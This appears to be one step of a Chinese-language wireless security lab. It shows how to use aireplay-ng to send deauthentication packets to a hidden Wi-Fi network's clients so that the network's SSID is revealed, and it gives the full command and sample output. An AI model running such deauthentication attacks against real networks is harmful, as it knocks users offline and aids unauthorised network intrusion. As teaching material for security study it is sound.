发起 Deauthentication 攻击以揭示 SSID
在此步骤中,你将使用 aireplay-ng 通过 deauthentication 攻击主动强制揭示 SSID。此攻击会向已连接的客户端发送特殊数据包,导致其与网络断开连接。行为良好的客户端会立即尝试重新连接,并在重新连接握手过程中,它会揭示 SSID。
首先,你需要打开一个新的终端。不要关闭运行 airodump-ng 的终端。
在新终端中,你将构建 aireplay-ng 命令。命令格式为:
sudo aireplay-ng --deauth <number_of_packets> -a <AP_BSSID> <interface>
--deauth 5: 我们将发送 5 个 deauthentication 数据包。
-a <AP_BSSID>: 这是你在步骤 2 中识别出的隐藏网络的 BSSID。
wlan2mon: 这是我们的监控接口。
为了方便操作,你可以从我们准备的文件中获取 BSSID。执行以下命令来发起攻击:
sudo aireplay-ng --deauth 5 -a $(cat /tmp/bssid.txt) wlan2mon
你将看到指示正在发送 deauthentication 数据包的输出。
10:05:10 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 6
10:05:10 Sending 64 directed DeAuths. STMAC: [YY:YY:YY:YY:YY:YY] [ 0|63 ACKs]
...
现在,快速切换回运行 airodump-ng 的第一个终端,以便在下一步观察结果。